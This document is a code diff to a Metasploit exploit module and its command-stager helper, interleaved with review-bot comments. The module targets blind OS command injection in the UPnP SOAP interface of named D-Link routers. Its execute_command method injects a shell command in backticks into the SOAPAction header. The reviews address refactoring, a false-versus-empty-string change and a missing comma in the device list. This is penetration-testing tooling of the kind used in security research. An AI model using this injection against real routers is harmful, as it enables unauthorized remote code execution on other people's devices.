diff --git a/lib/rex/exploitation/cmdstager/echo.rb b/lib/rex/exploitation/cmdstager/echo.rb index 253eb48214..462aade850 100644 --- a/lib/rex/exploitation/cmdstager/echo.rb +++ b/lib/rex/exploitation/cmdstager/echo.rb @@ -26,11 +26,10 @@ class CmdStagerEcho < CmdStagerBase # and initialize opts[:enc_format]. # def generate(opts = {}) - if opts[:temp] == false - opts[:temp] = '' - else - opts[:temp] = opts[:temp] || '/tmp/' - opts[:temp].gsub!(/\\/, "/") + opts[:temp] = opts[:temp] || '/tmp/' + + unless opts[:temp].empty? + opts[:temp].gsub!(/\\/, '/') opts[:temp] = opts[:temp].shellescape opts[:temp] << '/' if opts[:temp][-1,1] != '/' end diff --git a/modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb b/modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb index b6bdb4e24d..9ac06e2df9 100644 --- a/modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb +++ b/modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb @@ -18,9 +18,9 @@ class Metasploit3 < Msf::Exploit::Remote Different D-Link Routers are vulnerable to OS command injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability, there is no output for the executed command. This module has been tested on a DIR-645 device. - The following devices are also reported as affected: - DAP-1522 revB, DAP-1650 revB, DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB - DIR-815 revB, DIR-300 revB, DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR + The following devices are also reported as affected: DAP-1522 revB, DAP-1650 revB, + DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB, + DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR }, 'Author' => [ 
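Review bot: A caller that still passes `:temp => false` to `generate` now gets the `/tmp/` prefix, because `opts[:temp] || '/tmp/'` treats `false` the same as `nil`, whereas the removed branch mapped `false` to an empty prefix. Either keep accepting it with `opts[:temp] = '' if opts[:temp] == false` ahead of the default, or say in the comment above `generate` that an empty string is now the only way to disable the prefix. `gsub!` also rewrites the caller's string in place and raises on a frozen one; `opts[:temp] = opts[:temp].gsub(/\\/, '/')` avoids both. The body of `generate` continues past the end of the hunk.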
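Review bot: The re-wrapped device list in the module description loses a separator: `DIR-860L revB DIR-815 revB` now sits on one line with no comma, so it reads as a single entry. The old text relied on the line break between the two names; the new line should read `DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB, DIR-815 revB, DIR-300 revB,`. An accurate list matters here because it is what readers use to decide which devices to patch or isolate.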
@@ -36,21 +36,19 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DisclosureDate' => 'Feb 13 2015', 'Privileged' => true, - 'Platform' => 'unix', + 'Platform' => 'linux', 'Targets' => [ [ 'MIPS Little Endian', { - 'Platform' => 'linux', 'Arch' => ARCH_MIPSLE } ], [ 'MIPS Big Endian', # unknown if there are BE devices out there ... but in case we have a target { - 'Platform' => 'linux', 'Arch' => ARCH_MIPSBE } - ], + ] ], 'DefaultTarget' => 0 )) @@ -60,16 +58,17 @@ class Metasploit3 < Msf::Exploit::Remote def check uri = '/HNAP1/' - soapaction = "http://purenetworks.com/HNAP1/GetDeviceSettings" + soap_action = 'http://purenetworks.com/HNAP1/GetDeviceSettings' begin res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', 'headers' => { - 'SOAPAction' => soapaction, - }, + 'SOAPAction' => soap_action, + } }) + if res && [200].include?(res.code) && res.body =~ /D-Link/ return Exploit::CheckCode::Detected end @@ -92,26 +91,25 @@ class Metasploit3 < Msf::Exploit::Remote execute_cmdstager( :flavor => :echo, :linemax => 200, - :temp => false + :temp => '' ) - end def execute_command(cmd, opts) uri = '/HNAP1/' - cmd_new = "cd && cd tmp && export PATH=$PATH:. && " << cmd - soapaction = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`" + cmd_new = 'cd && cd tmp && export PATH=$PATH:. && ' << cmd + soap_action = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`" begin res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', 'headers' => { - 'SOAPAction' => soapaction, - }, - },1) + 'SOAPAction' => soap_action, + } + }, 3) rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end
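Review bot: In `check`, the status test is still written `[200].include?(res.code)` although the rest of the method was tidied in this commit; with a single accepted code, `res.code == 200` says the same thing more directly. The request path `'/HNAP1/'` and the `GetDeviceSettings` action URL are repeated in `execute_command` further down, so a shared constant would keep the two in step. `check` starts inside the hunk but its `rescue` and closing `end` are outside it.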
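Review bot: `cmd_new = '…' << cmd` in `execute_command` appends to a string literal in place, which raises once the file opts into frozen string literals; `cmd_new = 'cd && cd tmp && export PATH=$PATH:. && ' + cmd` builds a new string instead. The second argument to `send_request_cgi` changes from `1` to `3` with no explanation. Assuming it is the response timeout in seconds, a comment such as `# no command output is returned; the timeout only bounds the wait` would record why a short value is used. `execute_command` appears to continue past the end of the hunk.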